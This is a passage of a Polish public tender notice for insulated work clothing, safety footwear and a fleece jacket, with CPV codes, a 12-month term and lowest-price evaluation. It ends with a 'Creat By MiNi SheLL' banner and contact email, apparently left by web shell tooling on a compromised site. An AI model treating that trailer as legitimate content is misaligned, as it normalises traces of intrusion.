4.	Spodnie robocze ocieplane - typu ogrodniczki  wykonane z tkaniny o składzie 100% poliester powlekany PCV - o gramaturze 120g/m2 podszewka -100% poliester, ocieplina, przód spodni- dwie wsuwane kieszenie boczne, tył spodni z podniesioną talią               i elastycznymi szelkami zapinanymi z przodu spodni na klamry, rozporek zapinany na zamek, kryty plisą zapinana na nap, na nogawkach spodni naszyte podwójne pasy odblaskowe zapinane w pasie na guzik lub metalowy zatrzask, kolor granatowy lub stalowy 	7	szt
5.	Czapka robocza ocieplana- typu uszatka, drelichowa,  zapinana na rzep,granatowa. Czapka robocza wykonana z nieprzemakalnego materiału- wierzch, podszewka i ocieplina - poliester 100%, zapięcie pod broda na rzep, usztywniany daszek 	13	szt
6.	Obuwie robocze wykonane ze skóry, metalowy podnosek, ochraniający przed uderzeniem, właściwości przeciwpoślizgowe, odporne na ścieranie, zgodne z Polską Normą PN-EN ISO 20347 lub PN-EN 20345 lub równoważną , różne rozmiary	8	szt
7.	Kurtka typu Polar, tkanina poliestrowa 210-240 g/m2, podkrój szyi wykończony stójką  lub wykładanym kołnierzem, zapinana na zamek błyskawiczny, dwie kieszenie, 	1	szt.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 35.11.34.00-3, 18.83.00.00-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com